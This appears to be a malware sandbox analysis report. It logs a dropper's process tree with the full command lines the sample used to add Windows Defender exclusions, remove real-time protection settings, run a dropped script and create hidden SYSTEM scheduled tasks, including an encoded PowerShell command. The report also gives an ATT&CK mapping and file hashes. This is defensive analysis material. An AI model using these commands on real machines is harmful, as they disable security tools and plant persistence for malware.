  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2000
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\wtHdMeiQ\ZpxGaNpUsJmXRbow.wsf"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\wtHdMeiQ\ZpxGaNpUsJmXRbow.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:560
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1952
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:908
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1408
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:632
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1212
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1092
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1980
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1076
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1048
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:632
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:864
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:524
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1992
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1928
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:396
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gqkDGTezg" /SC once /ST 04:03:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Windows security bypass
    - Creates scheduled task(s)
    PID:920
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gqkDGTezg"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gqkDGTezg"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1732
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:688
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:1908
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 04:58:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\WHCBjUJ.exe\" 18 /site_id 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:1524
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "MFUxwpyluZmBswWip"
    3⤵
    PID:1664
- C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\WHCBjUJ.exe
  C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\WHCBjUJ.exe 18 /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1996
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:1652
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:560
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:1948
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:1536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\EJEbrU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:1576

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1608

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1396

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5292994644994882624837229169657401311957363665-1525338293-147581989-737356941"
1⤵
- Windows security bypass
PID:1436

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1204

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\nCUtXPa.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\nCUtXPa.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
232e654148d1b1562d2baa9696f85b9c

SHA1
2d806819656e66124511371d608ae9b08f9fa732

SHA256
1242a12d816ab67df702fef0e739229c5d2cd60cfe72da27aa99bbb6da926eca

SHA512
f445fc94669ae5b754f7f907955fc5eb52cffde2338396c84c49a0bccbffc13573f24fb1999a1250ade04f58c8ead45aeea98d12f45feb5e9c2c24764c97bac5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f8cd5daa7d6cb7b444041e8c94ab85ae

SHA1
ff2f85bd480da34b57a932718cb83fafb480fbc3

SHA256
c63cbde383a9c45bbf806ed4249da28a94bddbe30620ef54e37dd4b569ba8f99

SHA512
eac3c550b1e7518b26eb2ffb400f14fe498e176512f74cd733c39a7ca3ab3e814ce75d335044464a5f1a530b3c60547ab399d076547c2fb7409f23f256b0a8f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
0361bbfacfb99995cc4d0487f92c56a0

SHA1
751c7468a7cfabad77c3e3c1d469d0a4898aea02

SHA256
fa2102704ec3f6ed5967641d7f122cff9c6fdeeb94927b71be59b491bbfe4b14

SHA512
3ae16ad6aaa7b5586fa6b6234c66cf10f1513074e27fb2898310c7f7e8edacc8ff353e21df0a1836868fb402121f57b54c5f56044dec7022e6d1f3218006f861

Download Submit
C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\WHCBjUJ.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\WHCBjUJ.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
C:\Windows\Temp\YSrBLfWUtIHnuviW\wtHdMeiQ\ZpxGaNpUsJmXRbow.wsf

Filesize
8KB

MD5
a9ef97910775414886bdfd63ab140ace

SHA1
3f262eee6bd2bda2ccbd191f5665b53481bd133a

SHA256
c93ef297205b6db9062eabbff7658ed032438c3109c7fe6a55f045c127d06ba5

SHA512
065949ce2194a145c1c0c7b40ad293d69feccbe47e38c4b79d5cd9bc5c16d26515a7506e3485a252d11e915382e475b35da8eb7671bed2f4dbf740caa9d60a5d

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe

Filesize
6.3MB

MD5
00e3554ac38d57315baee9e675510297

SHA1
5b841150ed90571847a06ac5c9d919ea32fad1bc

SHA256
26ea3942d6bda205bad1e300563b0e788e8ce2847252278f07a082de938eb464

SHA512
6cfb07b208c062f8bc0e7708f218a91827b1aabd9ff1f81d49815ec898f79aca1a0f36d5e9430bfc3ec026a8409985a5f834450018f03542051af3bbcfcddcfa

Download Submit
\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe

Filesize
6.8MB

MD5
6cb87a9fc7dc1f2a5410fd428f5460f0

SHA1
2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

SHA256
fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

SHA512
4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

Download Submit
memory/908-185-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/908-183-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/908-182-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/908-184-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/908-181-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1064-102-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/1064-101-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/1064-96-0x000007FEF3A10000-0x000007FEF4433000-memory.dmp

Filesize
10.1MB

Download
memory/1064-99-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1064-95-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/1064-98-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/1064-97-0x000007FEF2EB0000-0x000007FEF3A0D000-memory.dmp

Filesize
11.4MB

Download
memory/1612-54-0x0000000076681000-0x0000000076683000-memory.dmp

Filesize
8KB

Download
memory/1704-71-0x0000000010000000-0x0000000010B5D000-memory.dmp

Filesize
11.4MB

Download
memory/1764-120-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp

Filesize
10.1MB

Download
memory/1764-121-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp

Filesize
11.4MB

Download
memory/1764-125-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1764-124-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1944-135-0x000007FEF3610000-0x000007FEF4033000-memory.dmp

Filesize
10.1MB

Download
memory/1944-136-0x000007FEF2AB0000-0x000007FEF360D000-memory.dmp

Filesize
11.4MB

Download
memory/1944-137-0x0000000002284000-0x0000000002287000-memory.dmp

Filesize
12KB

Download
memory/1944-140-0x000000000228B000-0x00000000022AA000-memory.dmp

Filesize
124KB

Download
memory/1944-139-0x0000000002284000-0x0000000002287000-memory.dmp

Filesize
12KB

Download
memory/1996-196-0x0000000002E40000-0x0000000002EC5000-memory.dmp

Filesize
532KB

Download